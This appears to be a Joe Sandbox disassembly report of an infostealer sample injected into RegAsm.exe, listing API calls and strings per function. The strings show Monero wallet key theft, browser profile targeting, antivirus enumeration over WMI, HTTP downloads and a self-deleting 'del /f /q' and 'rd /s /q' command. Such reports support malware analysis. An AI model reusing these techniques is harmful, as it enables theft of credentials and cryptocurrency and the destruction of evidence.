                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: String$AllocCreateFreeH_prologHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                    • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004118B3
                                                                                    • strtok_s.MSVCRT ref: 004118E4
                                                                                    • StrCmpCA.SHLWAPI(?,true,?,?,00000104,?,00000104,?,?,00000000), ref: 0041197C
                                                                                      • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                      • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                    • lstrcpy.KERNEL32(?,?), ref: 00411A33
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00411A6F
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00411AB6
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00411AFD
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00411B44
                                                                                    • strtok_s.MSVCRT ref: 00411CA7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$strtok_s$H_prologlstrlen
                                                                                    • String ID: false$true
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00404F2F
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                    • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004050D2
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 004050DD
                                                                                    • InternetCloseHandle.WININET(?), ref: 004050E6
                                                                                    • InternetCloseHandle.WININET(?), ref: 004050EF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseHandleHttp$H_prologOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                    • String ID: ERROR$ERROR$GET
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004041B7
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004041FE
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00404205
                                                                                    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404224
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00404238
                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040425C
                                                                                    • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404292
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004042B6
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004042C1
                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004042DF
                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404337
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404369
                                                                                    • InternetCloseHandle.WININET(?), ref: 00404372
                                                                                    • InternetCloseHandle.WININET(?), ref: 0040437B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseHandleHttp$H_prologHeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                    • String ID: GET
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004136E8
                                                                                    • memset.MSVCRT ref: 00413708
                                                                                    • memset.MSVCRT ref: 00413714
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 00413729
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 004138B5
                                                                                    • memset.MSVCRT ref: 004138C2
                                                                                    • memset.MSVCRT ref: 004138D0
                                                                                    • ExitProcess.KERNEL32 ref: 004138E1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: lstrcpymemset$H_prolog$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                    • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041092A
                                                                                    • CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000,?,00000000), ref: 00410942
                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000), ref: 00410953
                                                                                    • CoCreateInstance.OLE32(00426FAC,00000000,00000001,00426EDC,?,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000,?), ref: 0041096D
                                                                                    • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?), ref: 004109A3
                                                                                    • VariantInit.OLEAUT32(?), ref: 004109F6
                                                                                      • Part of subcall function 00410C8D: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,00410A1D,?,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000), ref: 00410C95
                                                                                      • Part of subcall function 00410C8D: CharToOemW.USER32(?,00000000), ref: 00410CA1
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • VariantClear.OLEAUT32(?), ref: 00410A2B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
                                                                                    • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                    • API String ID: 3694693100-315474579
                                                                                    • Opcode ID: 69e3ebb3ae139267ec9dcccb77a6a5073b61d7bf20a9a102ba59cc22b6a9a18b
                                                                                    • Instruction ID: eaee24b4b2737a5a762c4e74348500a03556ab89a27190f447ac073c3fdbdc8f
                                                                                    • Opcode Fuzzy Hash: 69e3ebb3ae139267ec9dcccb77a6a5073b61d7bf20a9a102ba59cc22b6a9a18b
                                                                                    • Instruction Fuzzy Hash: 5A418E70A01229BFCB20DB95DD49EEF7F79EF49B60F60411AF115A6180C7B85A41CBE8
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00410076
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,004262C7,00000001,00000000), ref: 004100BE
                                                                                    • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410108
                                                                                    • wsprintfA.USER32 ref: 00410132
                                                                                    • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041014F
                                                                                    • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410179
                                                                                    • lstrlenA.KERNEL32(?), ref: 0041018E
                                                                                    • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,004262F0), ref: 0041020E
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: OpenQueryValuelstrcpy$EnumH_prologlstrlenwsprintf
                                                                                    • String ID: - $%s\%s$?
                                                                                    • API String ID: 404191982-3278919252
                                                                                    • Opcode ID: 31e2b9dd4df46e591392e58f3efde1d97b51e578d32717b35a6573e8f202f5e3
                                                                                    • Instruction ID: 7ab7514c44e0da1f2f7805acf3a1e45dd26abe84cf75324248915fb0e6202ea1
                                                                                    • Opcode Fuzzy Hash: 31e2b9dd4df46e591392e58f3efde1d97b51e578d32717b35a6573e8f202f5e3
                                                                                    • Instruction Fuzzy Hash: 087102B190021DEEDF11EBE1CD84EEEBBB9BB18304F50417AE905B2151DB785A88CB65
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040F68E
                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 0040F6A4
                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000), ref: 0040F6C6
                                                                                    • memset.MSVCRT ref: 0040F708
                                                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 0040F841
                                                                                      • Part of subcall function 0040E156: strlen.MSVCRT ref: 0040E16D
                                                                                      • Part of subcall function 0040DD10: memcpy.MSVCRT ref: 0040DD30
                                                                                    Strings
                                                                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040F720, 0040F809
                                                                                    • N0ZWFt, xrefs: 0040F7AB, 0040F7B8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologOpenProcessmemcpymemsetstrlen
                                                                                    • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                    • API String ID: 3050127167-1622206642
                                                                                    • Opcode ID: 6d550b47649cbc074e826e347ff90771797366bbdea03ead8e58419020fff812
                                                                                    • Instruction ID: d92978c317b697945912aa173a1e05ead718c9e6d1350f194c4815b503896aae
                                                                                    • Opcode Fuzzy Hash: 6d550b47649cbc074e826e347ff90771797366bbdea03ead8e58419020fff812
                                                                                    • Instruction Fuzzy Hash: A8517E71900219AEDB20EB94DC81AEEBBB9EF04314F20017FF114B66C1DB795E88CB59
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004104E2
                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                                    • wsprintfA.USER32 ref: 004105AD
                                                                                    • lstrcat.KERNEL32(00000000,004262A0), ref: 004105BC
                                                                                      • Part of subcall function 004104A2: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004105DB
                                                                                      • Part of subcall function 00411154: malloc.MSVCRT ref: 00411162
                                                                                      • Part of subcall function 00411154: strncpy.MSVCRT ref: 00411172
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00410608
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heaplstrcat$AllocCurrentDirectoryH_prologInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                    • String ID: :\$C
                                                                                    • API String ID: 688099012-3309953409
                                                                                    • Opcode ID: 416253e965eb42c759364b255e4ecd1a0613b221ded167edafa7b177bf4c383f
                                                                                    • Instruction ID: 84e118196ac0f38cbb6e09dfb40efd972d04435529832d229da92da0b26732ed
                                                                                    • Opcode Fuzzy Hash: 416253e965eb42c759364b255e4ecd1a0613b221ded167edafa7b177bf4c383f
                                                                                    • Instruction Fuzzy Hash: 8E418071801158ABCB11EBE5DD89EEFBBBDEF4A304F10006EF505A3141EA785A48CBB5
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041311D
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                                                      • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                      • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                      • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                      • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                      • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                      • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                      • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041319F
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004131B6
                                                                                      • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 004131DD
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004131F2
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0041320D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: HttpInternetlstrcpylstrlen$H_prologOpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                    • API String ID: 3807055897-1526165396
                                                                                    • Opcode ID: d0459109369f2f4c7748f439c483f4eaf3f7582e003e90059872d5f537bb727b
                                                                                    • Instruction ID: 555d10d1ffafafdd123518b884250a5375e6a4b62cd9d48d02a2f87644db10f1
                                                                                    • Opcode Fuzzy Hash: d0459109369f2f4c7748f439c483f4eaf3f7582e003e90059872d5f537bb727b
                                                                                    • Instruction Fuzzy Hash: 7141A6B1900258EACB11FFA1D956FDDB7B4AF18708F10007FE90173182DB386B488A6A
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040ED0D
                                                                                    • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED51
                                                                                    • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EDC5
                                                                                    • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EEE1
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040D3FA: _EH_prolog.MSVCRT ref: 0040D3FF
                                                                                      • Part of subcall function 0040B8AF: _EH_prolog.MSVCRT ref: 0040B8B4
                                                                                    • StrCmpCA.SHLWAPI(00000000), ref: 0040EFB0
                                                                                    • StrCmpCA.SHLWAPI(00000000), ref: 0040F025
                                                                                    • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040F140
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy
                                                                                    • String ID: Stable\$ Stable\$firefox
                                                                                    • API String ID: 2120869262-2697854757
                                                                                    • Opcode ID: cbc591070e23e547dad82c25336e79ec262d8277c697555a2c597f71d100fc77
                                                                                    • Instruction ID: 1d26c69091b310833a01da009a7ea8e67b8bedb29d0866ac6f751b535dc35178
                                                                                    • Opcode Fuzzy Hash: cbc591070e23e547dad82c25336e79ec262d8277c697555a2c597f71d100fc77
                                                                                    • Instruction Fuzzy Hash: 70E19171D00249EADF10FBB9D956BDDBFB4AB09304F10817AE80477682DB78570C8BA6
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00401C70
                                                                                    • memset.MSVCRT ref: 00401C8E
                                                                                      • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                      • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                      • Part of subcall function 00401000: RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                      • Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 00401CB2
                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 00401CBF
                                                                                    • lstrcat.KERNEL32(?,.keys), ref: 00401CDA
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                    • memset.MSVCRT ref: 00401E9D
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrcat$File$AllocCreateHeaplstrlenmemset$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait
                                                                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                    • API String ID: 1518627966-218353709
                                                                                    • Opcode ID: e9d5ebe04bd7bc58995d170363b86178bbbe3cf24575e7001856d206ab765175
                                                                                    • Instruction ID: 901e0a47ee0b89a43ddfaf22904e5be17bd7688e420c1fcef0611cd27edb7556
                                                                                    • Opcode Fuzzy Hash: e9d5ebe04bd7bc58995d170363b86178bbbe3cf24575e7001856d206ab765175
                                                                                    • Instruction Fuzzy Hash: 06715D71D00248EACB14EBE4D956BDDBBB8AF18308F54407EE505B31C2DE78264CCB69
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00404DCF
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00404E38
                                                                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
                                                                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4
                                                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
                                                                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404EE9
                                                                                    • InternetCloseHandle.WININET(?), ref: 00404EF2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmp
